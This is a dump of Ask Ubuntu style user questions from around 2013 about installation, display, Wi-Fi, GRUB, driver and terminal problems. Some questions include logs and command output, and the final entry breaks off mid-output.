351166	wubi installation problem	when i try installing ubuntu via the wubi installer i get the message '' an error occurred permission denied for more information , please see the log file : ( written below post ) i 've also tried installing from boot dvd but after i choose to either try ubuntu without installing or installing the screen just goes black and nothing happens . i 've tried with the latest versions of the 64bit ( i 'm currently running windows 7 64bit home premium ) . any suggestions please ? log file : 09-28 13:21 info root : === wubi 13.04 rev279 === 09-28 13:21 debug root : logfile is c : \users\fnatmi~1\appdata\local\temp\wubi-13.04-rev279.log 09-28 13:21 debug root : sys.argv = [ 'main.pyo ' , ' -- exefile= '' g : \\wubi.exe '' ' ] 09-28 13:21 debug commonbackend : data_dir=c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp\data 09-28 13:21 debug windowsbackend : 7z=c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp\bin\7z.exe 09-28 13:21 debug windowsbackend : startup_folder=c : \programdata\microsoft\windows\start menu\programs\startup 09-28 13:21 debug commonbackend : fetching basic info ... 09-28 13:21 debug commonbackend : original_exe=g : \wubi.exe 09-28 13:21 debug commonbackend : platform=win32 09-28 13:21 debug commonbackend : osname=nt 09-28 13:21 debug commonbackend : language=da_dk 09-28 13:21 debug commonbackend : encoding=cp1252 09-28 13:21 debug windowsbackend : arch=amd64 09-28 13:21 debug commonbackend : parsing isolist=c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp\data\isolist.ini 09-28 13:21 debug commonbackend : adding distro edubuntu-i386 09-28 13:21 debug commonbackend : adding distro kubuntu-amd64 09-28 13:21 debug commonbackend : adding distro mythbuntu-i386 09-28 13:21 debug commonbackend : adding distro edubuntu-amd64 09-28 13:21 debug commonbackend : adding distro ubuntu studio-amd64 09-28 13:21 debug commonbackend : adding distro ubuntu-amd64 09-28 13:21 debug commonbackend : adding distro lubuntu-i386 09-28 13:21 debug commonbackend : adding distro ubuntu-i386 09-28 13:21 debug commonbackend : adding distro mythbuntu-amd64 09-28 13:21 debug commonbackend : adding distro kubuntu-i386 09-28 13:21 debug commonbackend : adding distro ubuntu studio-i386 09-28 13:21 debug commonbackend : adding distro lubuntu-amd64 09-28 13:21 debug windowsbackend : fetching host info ... 09-28 13:21 debug windowsbackend : registry_key=software\microsoft\windows\currentversion\uninstall\wubi 09-28 13:21 debug windowsbackend : windows version=vista 09-28 13:21 debug windowsbackend : windows_version2=windows 7 home premium 09-28 13:21 debug windowsbackend : windows_sp=none 09-28 13:21 debug windowsbackend : windows_build=7601 09-28 13:21 debug windowsbackend : gmt=1 09-28 13:21 debug windowsbackend : country=dk 09-28 13:21 debug windowsbackend : timezone=europe/copenhagen 09-28 13:21 debug windowsbackend : windows_username=fnatmiden 09-28 13:21 debug windowsbackend : user_full_name=fnatmiden 09-28 13:21 debug windowsbackend : user_directory=c : \users\fnatmiden 09-28 13:21 debug windowsbackend : windows_language_code=1030 09-28 13:21 debug windowsbackend : windows_language=danish 09-28 13:21 debug windowsbackend : processor_name=intel ( r ) core ( tm ) i7 cpu q 720 @ 1.60ghz 09-28 13:21 debug windowsbackend : bootloader=vista 09-28 13:21 debug windowsbackend : system_drive=drive ( c : hd 18025.890625 mb free ntfs ) 09-28 13:21 debug windowsbackend : drive=drive ( c : hd 18025.890625 mb free ntfs ) 09-28 13:21 debug windowsbackend : drive=drive ( d : hd 1024.0 mb free ntfs ) 09-28 13:21 debug windowsbackend : drive=drive ( e : hd 87.93359375 mb free fat32 ) 09-28 13:21 debug windowsbackend : drive=drive ( f : cd 0.0 mb free udf ) 09-28 13:21 debug windowsbackend : drive=drive ( g : cd 0.0 mb free cdfs ) 09-28 13:21 debug windowsbackend : uninstaller_path=none 09-28 13:21 debug windowsbackend : previous_target_dir=none 09-28 13:21 debug windowsbackend : previous_distro_name=none 09-28 13:21 debug windowsbackend : keyboard_id=67503110 09-28 13:21 debug windowsbackend : keyboard_layout=dk 09-28 13:21 debug windowsbackend : keyboard_variant= 09-28 13:21 debug commonbackend : python locale= ( 'da_dk ' , 'cp1252 ' ) 09-28 13:21 debug commonbackend : locale=da_dk.utf-8 09-28 13:21 debug windowsbackend : total_memory_mb=4086.86328125 09-28 13:21 debug commonbackend : searching isos on usb devices 09-28 13:21 debug commonbackend : searching for local cds 09-28 13:21 debug distro : checking whether c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp is a valid ubuntu cd 09-28 13:21 debug distro : does not contain c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp\casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp is a valid ubuntu cd 09-28 13:21 debug distro : does not contain c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp\casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp is a valid kubuntu cd 09-28 13:21 debug distro : does not contain c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp\casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp is a valid kubuntu cd 09-28 13:21 debug distro : does not contain c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp\casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp is a valid mythbuntu cd 09-28 13:21 debug distro : does not contain c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp\casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp is a valid mythbuntu cd 09-28 13:21 debug distro : does not contain c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp\casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp is a valid edubuntu cd 09-28 13:21 debug distro : does not contain c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp\casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp is a valid edubuntu cd 09-28 13:21 debug distro : does not contain c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp\casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp is a valid lubuntu cd 09-28 13:21 debug distro : does not contain c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp\casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp is a valid lubuntu cd 09-28 13:21 debug distro : does not contain c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp\casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp is a valid ubuntu studio cd 09-28 13:21 debug distro : does not contain c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp\casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp is a valid ubuntu studio cd 09-28 13:21 debug distro : does not contain c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp\casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether d : \ is a valid ubuntu cd 09-28 13:21 debug distro : does not contain d : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether d : \ is a valid ubuntu cd 09-28 13:21 debug distro : does not contain d : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether d : \ is a valid kubuntu cd 09-28 13:21 debug distro : does not contain d : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether d : \ is a valid kubuntu cd 09-28 13:21 debug distro : does not contain d : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether d : \ is a valid mythbuntu cd 09-28 13:21 debug distro : does not contain d : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether d : \ is a valid mythbuntu cd 09-28 13:21 debug distro : does not contain d : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether d : \ is a valid edubuntu cd 09-28 13:21 debug distro : does not contain d : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether d : \ is a valid edubuntu cd 09-28 13:21 debug distro : does not contain d : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether d : \ is a valid lubuntu cd 09-28 13:21 debug distro : does not contain d : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether d : \ is a valid lubuntu cd 09-28 13:21 debug distro : does not contain d : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether d : \ is a valid ubuntu studio cd 09-28 13:21 debug distro : does not contain d : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether d : \ is a valid ubuntu studio cd 09-28 13:21 debug distro : does not contain d : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether e : \ is a valid ubuntu cd 09-28 13:21 debug distro : does not contain e : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether e : \ is a valid ubuntu cd 09-28 13:21 debug distro : does not contain e : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether e : \ is a valid kubuntu cd 09-28 13:21 debug distro : does not contain e : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether e : \ is a valid kubuntu cd 09-28 13:21 debug distro : does not contain e : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether e : \ is a valid mythbuntu cd 09-28 13:21 debug distro : does not contain e : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether e : \ is a valid mythbuntu cd 09-28 13:21 debug distro : does not contain e : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether e : \ is a valid edubuntu cd 09-28 13:21 debug distro : does not contain e : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether e : \ is a valid edubuntu cd 09-28 13:21 debug distro : does not contain e : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether e : \ is a valid lubuntu cd 09-28 13:21 debug distro : does not contain e : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether e : \ is a valid lubuntu cd 09-28 13:21 debug distro : does not contain e : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether e : \ is a valid ubuntu studio cd 09-28 13:21 debug distro : does not contain e : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether e : \ is a valid ubuntu studio cd 09-28 13:21 debug distro : does not contain e : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether f : \ is a valid ubuntu cd 09-28 13:21 debug distro : does not contain f : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether f : \ is a valid ubuntu cd 09-28 13:21 debug distro : does not contain f : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether f : \ is a valid kubuntu cd 09-28 13:21 debug distro : does not contain f : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether f : \ is a valid kubuntu cd 09-28 13:21 debug distro : does not contain f : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether f : \ is a valid mythbuntu cd 09-28 13:21 debug distro : does not contain f : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether f : \ is a valid mythbuntu cd 09-28 13:21 debug distro : does not contain f : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether f : \ is a valid edubuntu cd 09-28 13:21 debug distro : does not contain f : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether f : \ is a valid edubuntu cd 09-28 13:21 debug distro : does not contain f : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether f : \ is a valid lubuntu cd 09-28 13:21 debug distro : does not contain f : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether f : \ is a valid lubuntu cd 09-28 13:21 debug distro : does not contain f : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether f : \ is a valid ubuntu studio cd 09-28 13:21 debug distro : does not contain f : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether f : \ is a valid ubuntu studio cd 09-28 13:21 debug distro : does not contain f : \casper\filesystem.squashfs 09-28 13:21 debug distro : checking whether g : \ is a valid ubuntu cd 09-28 13:21 debug distro : does not contain g : \casper\vmlinuz.efi 09-28 13:21 debug distro : checking whether g : \ is a valid ubuntu cd 09-28 13:21 debug distro : parsing info from str=ubuntu 13.04 `` raring ringtail '' - release i386 ( 20130424 ) 09-28 13:21 debug distro : parsed info= { 'name ' : 'ubuntu ' , 'subversion ' : 'release ' , 'version ' : '13.04 ' , 'build ' : '20130424 ' , 'codename ' : 'raring ringtail ' , 'arch ' : 'i386 ' } 09-28 13:21 info distro : found a valid cd for ubuntu : g : \ 09-28 13:21 info root : running the cd menu ... 09-28 13:21 debug windowsfrontend : __init__ ... 09-28 13:21 debug windowsfrontend : on_init ... 09-28 13:21 info winuipage : appname=wubi , localedir=c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp\translations , languages= [ 'da_dk ' , 'da ' ] 09-28 13:21 info winuipage : appname=wubi , localedir=c : \users\fnatmi~1\appdata\local\temp\pylba69.tmp\translations , languages= [ 'da_dk ' , 'da ' ] 09-28 13:21 info root : cd menu finished 09-28 13:21 info root : rebooting 09-28 13:21 debug tasklist : # running tasklist ... 09-28 13:21 debug tasklist : # # running reboot ... 09-28 13:21 debug tasklist : # # finished reboot 09-28 13:21 debug tasklist : # finished tasklist 09-28 13:21 debug root : application.quit 09-28 13:21 debug windowsfrontend : frontend.quit 09-28 13:21 debug windowsfrontend : frontend.on_quit 09-28 13:21 debug root : application.on_quit 09-28 13:21 info root : sys.exit
351168	diffrence between the dns setting in etc/resolv conf and etc/network/interfaces	i want to know the difference between dns settings in /etc/resolv.conf and /etc/network interfaces . for example when i share internet connection from other computer ( xp ) , i used to add the name server ( dns address of my isp ) in /etc/resolv.conf and i could successfully share the internet . but i want to know what is the relevance of setting the dns address in the /etc/network/interfaces along with ip and gateway address ? where does my computer look up for resolving ip address of some website when browsing ? is it resolv.conf or network interfaces ?
351169	ubuntu 13.04 numlock ignored on laptop	i have a full keyboard on my laptop with a separate numeric keypad . the numlock is ignored when i press shift . so i have to set system settings - > keyboard - > layout settings - > options - > miscellaneous compatibility options - > shift with numeric keypad keys works as in ms windows = ticked i do n't have to do this on my desktop though . the numlock behaves as it should . any ideas whats going on ?
351171	ca n't view ubuntu like it should appear	new to linux and boy am i seeing that fact . i 'm wanting to try to have it set up so i can turn the computer and it starts up immediately with ubunutu , from a flash drive . i was n't having any kind of luck doing that so i stumbled into the idea of worse case scenario ... use vmware player . i tried starting a new machine and it seemed like it was going to work . everything loaded in and i came up to the main screen . one problem there was no icons . just the blank start up screen . i tried scrolling the cursor around the screen toward the area where the icons should appear and black boxes popped up as i was scrolling down the screen . i decided to click on the boxes and see what would happen . sure enough there were icons under those black boxes and i could open up libreoffice , firefox , system settings , etc . i did n't know what i was opening , until after i clicked on it , but i could open it . i looked here on askubuntu and saw it mentioned that it might be a hardware issue and to switch to unity2d . i tried and that failed . in further reading in getting started with ubunutu 12.10 , there is no unity2d option anymore . yes , i have 12.10 installed . the main screen when it appears is n't full size , it 's about 3/4 of the screen . as i scroll down the 'icons ' sometimes the screen flashes other times i lose the wallpaper on ubunutu altogether . first impressions are lasting impressions and currently my first impressions of linux are good ones to say the least ... but i 'm still willing to progress forward . how do i get to a normal operating interface ?
351173	ubuntu network manager keeps asking for wi-fi password	i 've been running 12.10 on my laptop for almost a year , never had any problems . since yesterday , however , i ca n't connect to my home network . ubuntu just keeps asking for the network key , and i am sure i 'm writing the correct one . i 'm using ubuntu 12.10 , and wpa encryption . i 've already tried to `` forget '' the network , restarting network-manager , unchecking `` available to all users '' as suggested in answers to similar questions , but nothing seems to work . i have a desktop running 13.04 and it works flawlessly , no issues whatsoever . are there any other ways/workarounds to fix this ? was this caused by some recent updates to 12.10 ?
351175	installation reading 'file not found '	i recently created a bootable usb with ubuntu to install on my hp pavilion dv67oo laptop , but it reads : /casper/vmlinuz.efi : file not found . i double checked the usb file , and it 's in the casper folder . i do n't know what to do . what could i be doing wrong ?
351181	rmdir on my machine does n't have the -r argument	i checked the man page for it using man rmdir and all it has is -- ignore-fail-on-non-empty , -p , -v , -- help , and -- version . what am i missing ? i 'm using ubuntu 12.04 lts
351188	question about playonlinux , wine , and graphics drivers	i just installed ubuntu 12.04 lts x64 bit , and i want to get starcraft ii : hots to work . i have it working now with a lot of wresting , but it runs 40fps slower than when i had windows 7 x64 bit on this computer . so far i do n't have any crashes though , but sub-30fps is pretty unplayable for sc2 . i used playonlinux to install starcraft following this guide . i used wine 1.5.26 , but i later updated to wine 1.6 . as for graphics drivers it was a real pain , which apparently is very common . i have a nvidia gtx260 , and i installed the drivers for it using this guide . i was expecting a 5-10fps drop since i do n't think i 'm using real nvidia drivers , but a 40fps drop . am i missing anything ? do any of you have any experience running sc2 on ubuntu at full speed ?
351191	suddenly spotify does n't work anymore	i 've been using spotify for 18 months without a problem . i use ubuntu 12.04 . today spotify stopped and does n't start anymore . i only see a quick flash of the spotify-startup-screen and thatĺ it . i uninstalled using synaptic and reinstalled using synaptic . no solution . i uninstalled using synaptic and reinstalled by terminal . no solution . i used backup to set the system back two days . no solution . i see no error message and i ran out of options i know of .
351195	1st identical monitor stuck on 800x600	using ubuntu 12.04 lts currently , i 'm using two hp lp2065 monitors . i 'm using a geforce 210 as of right now , but i 'm getting a certain problem , the monitor hooked to the dvi cable is stuck at 800x600 , but i 'm freely getting 1080x1024 on my monitor hooked to the vga port on the graphics card ( using a vga to dvi cable ) . this is what it shows with xrandr : screen 0 : minimum 8 x 8 , current 2080 x 1024 , maximum 8192 x 8192 dvi-i-0 disconnected ( normal left inverted right x axis y axis ) vga-0 connected 1280x1024+800+0 ( normal left inverted right x axis y axis ) 410mm x 310mm 1280x1024 85.0 + 75.0 60.0* 1280x960 60.0 1024x768 85.0 75.0 60.0 800x600 85.1 60.3 640x480 85.0 75.0 59.9 dvi-i-1 connected 800x600+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 800x600 60.3*+ hdmi-0 disconnected ( normal left inverted right x axis y axis ) 1280x1024_60_new ( 0x293 ) 138.5mhz h : width 1280 start 1368 end 1504 total 1728 skew 0 clock 80.2khz v : height 1024 start 1025 end 1028 total 1069 clock 75.0hz then , this happens : $ sudo xrandr -- newmode 1080x1024_60.00 91.25 1080 1144 1256 1432 > 1024 1027 1037 1063 -hsync +vsync $ sudo xrandr -- addmode dvi-i-1 1080x1024_60.00 x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 31 current serial number in output stream : 32 i 'm not sure exactly what to do , it probably is something silly , but i 've only really been using ubuntu for a day or two . it 's me again , here is my xorg.conf . not sure what it is for , but that 's all it shows . ( /etc/x11/xorg.conf ) section `` device '' identifier `` default device '' option `` nologo '' `` true '' endsection edit : thanks jokerdino for the edit .
351201	changing boot priority to external disk	i just installed xubuntu . i dual booted it , my main os is windows 7 . i installed ubuntu onto a external hdd and is my second boot priority so since i use it the most , it is a hassle to change every time i log onto my computer . my question is this : if i go an change the boot priority to automatically boot to ubuntu , will this have any affect on my windows 7 , which is installed on the hard drive . it would be ideal to be able to boot directly into ubuntu , but i dont want to risk ruining my windows to do so . i know how to change the boot priority , i needed to do that for the dual boot , but i want to make sure setting it up like this wont hurt anything . thank you for you responses .
351202	cloud vs local sync	will there be an option to sync my ubuntu phone and a desktop via usb or local wifi and not the cloud ?
351204	amd radeon hd6450 compatibility 13.04	my old graphics card hase just died . so i ordered a new msi radeon hd6450 . what is the best way to install the amd drivers ? thank you . regards , richard
351212	12.04 boots to command line	i 'm running 12.04 lts , and as usual when the package manager prompts me to update i do it . i updated last night ( sept. 27 ) and now the system boots only into command line mode . before doing so i see the purple screen with the words `` ubuntu 12.04 '' and the little dots going bright and dark , and then bam i 'm in command line . i 've tried using sudo apt-get to update my files , in case it was incomplete , and it tells me that everything is up to date . if i type the command `` unity '' i get a `` fatal error '' related to `` no display variable set '' . i have seen other questions and answers on this topic but i do not understand the answers provided . i am stuck . all i did was upgrade when the system told me to , what did i do wrong ? i did not download any new video drivers lately .
351215	why ca n't i create a new gnome terminal profile or edit one ?	when i create a new gnome profile , it is n't saved when i hit close . when i create a new gnome profile , i ca n't edit the preferences to change things like the colour , font , etc. , either . i also ca n't change the default ones in the same way . all the options are greyed out . would anyone know why this would be ?
351216	which music programmes should i consider installing on ubuntu ?	i would like to use a music programme on ubuntu that meets the following requirements : the ability to batch rename , convert and meta tag music files , the ability to scrobble plays in the music programme to last.fm , and the ability to sync with 6th generation ipod nano and to scrobble ipod plays to last.fm . on windows i would satisfy requirement 1 with foobar2000 , which enabled me to run batch rename processes with preset naming formats as well as to convert batches of music files with finely tuned settings such as output file format , bit rate , output location , naming convention , etc . i would sync my ipod and scrobble my ipod plays to last.fm using itunes ( and both players supported in-player scrobbling to last.fm ) . is there a single music programme in ubuntu that can do all this ? if not , what is a viable combination of music players that would satisfy the above-mentioned needs ? note : i am using ubuntu 12.04
351217	ubuntu boots to grub command line after using ubuntu windows installer	i 'm new to ubuntu so bear with me . i have a windows 7 computer and i recently used the windows installer to install ubuntu 12.04 ( followed these steps : http : //www.ubuntu.com/download/desktop/install-ubuntu-with-windows ) . upon installation completion , i restarted my computer . when it booted up , it automatically booted into ubuntu , rather than giving me the windows boot manager to be able to chose between windows 7 or ubuntu ( which is what i want ) . so i shutdown my computer and turned it back on , this time pressing the space bar to load windows boot manager . it gave me the option to boot into windows 7 or ubuntu . so far so good . however , when i select ubuntu , rather than booting up the ubuntu desktop , it takes me to a black-screen grub command line . the command window displays the following : gnu grub version 1.99-21ubuntu3.10 minimal bash-like editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completion . grub > _ i try using the `` boot '' command , but that gives me the following error : `` error : no loaded kernel '' any ideas what went wrong or how to fix this ? all i want is to be able to choose between booting into the ubuntu desktop or the windows 7 desktop .
351220	customized launcher to launch new instance ; instead of activating the existing instance	i have a customized launcher for gnome-terminal . i prefer gnome-terminal to start in a certain folder , such as ~/desktop . to accomplish this , i use a customized launcher that i also locked to the launcher bar . how would i invoke multiple instances of this application from the launcher bar ? for example , i used gnome-desktop-item-edit to create a launcher that invokes : gnome-terminal -- working-directory=/home/jack/desktop ( absolute path required for some reason ) and i invoke this and when it is running i also lock this to the launcher bar . unfortunately , this launcher bar icon creates only one terminal . a second attempt to launch the same thing will just activate the original terminal . there is also no context menu ( from the right click ) to offer new terminal . this is unlike the default terminal which does offer a right-click way to create a new , or in this case , second terminal . i have the same problem with google-chrome -- incognito . i would like the same launcher , locked to the launcher bar to invoke a new google-chrome -- incognito or to offer new incognito window in the context menu available from the right click . this is unlike the default chrome launcher which does offer a right-click way to create a new , or in this case , second chrome browser .
351222	jar on the unity side bar ?	so i have an executable jar i want to be able to put on the sidebar i have it opening with java 8 with double click .
351225	how can i execute c programs in ubuntu 13.04	i upgraded my ubuntu to 13.04 version . after this upgrade i am not able to execute c programs in terminal . when i try to execute , it shows an error as shown below bash : ./cd : permission denied where cd is my executable file which is working fine in lower versions of ubuntu .
351226	desktop icons missing after `` logging on '' to 13.04	so i signed in to my ubuntu 13.04 ( dual booted ) computer today and i noticed something strange , the unity lancher had appeared as soon as i signed in , but sign in box has stayed where it is and not disappeared , along with the ubuntu logo and white dots all over the screen . in addition to this my desktop icons have disappeared . any advice as how i could go about getting rid of the login screen and retrieve my icons ? cheers .
351227	unable to send data with tp-link router	i 'm posting this question on windows because when i try to do `` sending activities '' , like posting on forums or uploading image files to image host websites on my recently installed ubuntu system , the operation does not conclude . when i plug my laptop direcly on my modem , the connection works perfectly , even on ubuntu , but when i try to access my router , ( installed for internet sharing purpose ) both by wi-fi connection and by an ethernet cable , i face the mentioned problem ( just under ubuntu ) . i looked out for the solution on the web until i get exhausted . hope some of you have things to teach me .
351232	icons on the desktop do not state the name of the file/directory ?	how do i fix the desktop icon which do n't show the file/directory names they are associated with and has an icon size which is to small to be on the desktop ? i scanned through unity-tweak-tool but found no option option relevant to this . ubuntu 13.04 it is . screenshot :
351235	can not access desktop , only tty1 ?	i recently updated from ubuntu 12.04 to ubuntu 12.10 . when it was finished updating , i restarted my computer . everything was working fine and dandy , until it came to rebooting . it rebooted normally at first , then the backlight shut off and the screen was totally black and not responding to anything . i rebooted a few more times , and a screen reading `` ubuntu 12.10 thinkpad-thinkpad-t43 tty2 '' appeared and asked for my password . the password was not correct , but i was able to reset it . i can now log in , but it just looks like command line . i ca n't access my desktop . any advice ? also , would putting the 12.04 iso files on a flash-drive and booting from that help ? video card : ati x300 laptop : ibm thinkpad t43 startx on tty1 does n't result in anything besides an error message : '' fatal server error : no screens found ( ee ) '' and there 's a more more than that . ok , so i booted to tty1 , and a notification came up saying that ubuntu 13.04 was available . should i install it , or would it mess my computer up even more ?
351236	stuck in grub rescue limbo- please help	i installed ubuntu about a year ago and yesterday i deleted the partition , because my parents were annoyed with the startup menu . i did n't know that i had to fix the 'mbr ' . now every time i try to boot the computer the grub menu pops up and says that the partition can not be found . i made an ubuntu dvd but it does n't turn on automatically and i have no clue how to do it manually . please help me , i have no clue what to do . could someone at least tell me how to retrieve data or documents .
351238	can not type at all in terminal ?	i seem to be unable to type in terminal at all - there is no $ mark , just a flashing white block in the top left corner . it 's a lubuntu install using the chrubuntu script . i recently switched the default shell in /etc/passwd , to solve the issue with the arrow keys in terminal . changing it back does n't fix the problem . i can not sign into the ctrl+alt+f3 command line screen at all . lxterminal does n't work either . any pointers ?
351239	ssh x11 forwarding very slow using xshell	my server is ubuntu 12.10 and my client is windows 7 64bit now i am using xshell to connect my server via ssh but after i forwarding x11 , it 's take a long time ! ! after i enter $ matlab -nodesktop it 's almost take 5~10 mins to ready for use i have found some speed up issue on the web but it 's work on mac not on windows ( xshell ) ! following is solution for mac and it 's worked perfect ! ssh -c arcfour , blowfish-cbc -xc username @ host but when i use xshell it 's always think -c arcfour , blowfish-cbc -xc usernameis my username ! is there any other way to make it faster ?
351240	cd/dvd launcher will not show up	i accidentally clicked the unlock from launcher instead of eject . now the launcher does n't show up at all when a cd/dvd is inserted so i can not lock it back to the launcher . i do n't want to create a launcher that is always visible , i only want to see the icon when a cd/dvd is inserted . i need some help to get it back .
351241	can not install canon pixma mp630 driver for scanner	i am really disappointed . i was able to download from canon webpage the pixma mp630 linux drivers as deb packages . content is printer drivers and scanner . actually the ubuntu 13.04 i have did install printer fine , but it wont scan now i am left wth the .deb packages from https % 3a % 2f % 2fwww.canon.de % 2fsupport % 2fconsumer_products % 2fproducts % 2ffax__multifunctionals % 2finkjet % 2fpixma_mp_series % 2fpixma_mp630.aspx % 3ftype % 3ddownload % 26page % 3d1 & h=laqgwxuy9 and dont know how to install ? ? dpkg -i *deb will fail error comes ldconfig deferred processing now taking place so i can not install the 2 available deb packages any help appreciated
351243	.exe files getting downloaded when asked to install `ubuntu-restricted-extras`	i was trying to install adobe flash plugin for firefox 24.0 on ubuntu 12.04 for which i executed sudo apt-get install ubuntu-restricted-extras and i got the following messages : what suprises me is the packages it is downloading : .exe is this normal ?
351244	unable find package linux-header-3.2.46	linux-header package is not installed . root @ pc-4 : ~ # apt-cache policy linux-headers-3.2.46 n : could n't find any package by regex 'linux-headers-3.2.46' root @ pc-4 : ~ # root @ pc-4 : ~ # unable to install packages root @ pc-4 : ~ # apt-get install linux-headers-3.2.46 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package linux-headers-3.2.46 e : could n't find any package by regex 'linux-headers-3.2.46' root @ pc-4 : ~ # uname -r 3.2.46 root @ pc-4 : ~ # uname -a linux pc-4.app.ch-geni-net.em could you please tell me y this error message is coming ? the below command does n't solve the problem sudo ln -fs /usr/src/linux-headers- $ ( uname -r ) /lib/modules/ $ ( uname -r ) /build os : root @ pc-4 : /home # lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise root @ pc-4 : /home # it is running on emulab.net virtual pc . could you please help me in solving this .
351250	firefox edit url in external editor plugin ?	i often type long urls into firefox 's location/address bar ( usually a url with many get parameters ) . since i must scroll left and right in the location bar to see the entire url , it 's hard to edit . what plugin lets me edit the address/location in an external editor ? or at least edit the get parameters i 'm sending and then re-send the request ? i realize i could use `` firefox -remote '' from the command-line , but that seems ugly .
351254	can not connect to wifi in ubuntu	i just installed ubuntu 12 desktop on a dell inspiron n3010 . the machine is intel i3 and originally came with windows 7 system . i can not see any of the available wifi . my wireless network is ok in other non ubuntu machines . in ubuntu , i could connect to the internet using wired network only . i am new to ubuntu . please , let me know how to troubleshoot the problem step by step . how can i know if the wireless adapter driver is installed properly ? what command should i try ?
351255	advanced-n 6205 with x230 not visible	i recently upgraded my lenovo x230 with an advanced-n 6205 wireless card from ebay ( i just swapped them over ) . as i understand it , this should just work out of the box on 13.04 , but unfortunately i get nothing at all on the user end . i 've read that the x230 requires a lenovo specific wireless card , so i was initially worried that it was something to do with this , but i got it working just fine under windows 7 ( after installing the drivers through the lenovo tool ) . the card is visible with lspci and iwlwifi is loaded . sudo ifconfig wlan0 up yields : wlan0 : error while getting interface flags : no such device lspci -vv yields the following : devcap : maxpayload 128 bytes , phantfunc 0 , latency l0s < 512ns , l1 unlimited exttag- attnbtn- attnind- pwrind- rbe+ flreset+ devctl : report errors : correctable- non-fatal- fatal- unsupported- rlxdord+ exttag- phantfunc- auxpwr- nosnoop+ flreset- maxpayload 128 bytes , maxreadreq 128 bytes devsta : correrr+ uncorrerr- fatalerr- unsuppreq+ auxpwr+ transpend- lnkcap : port # 0 , speed 2.5gt/s , width x1 , aspm l0s l1 , latency l0 < 4us , l1 < 32us clockpm+ surprise- llactrep- bwnot- lnkctl : aspm l1 enabled ; rcb 64 bytes disabled- retrain- commclk+ extsynch- clockpm+ autwiddis- bwint- autbwint- lnksta : speed 2.5gt/s , width x1 , trerr- train- slotclk+ dlactive- bwmgmt- abwmgmt- capabilities : [ 100 v1 ] advanced error reporting uesta : 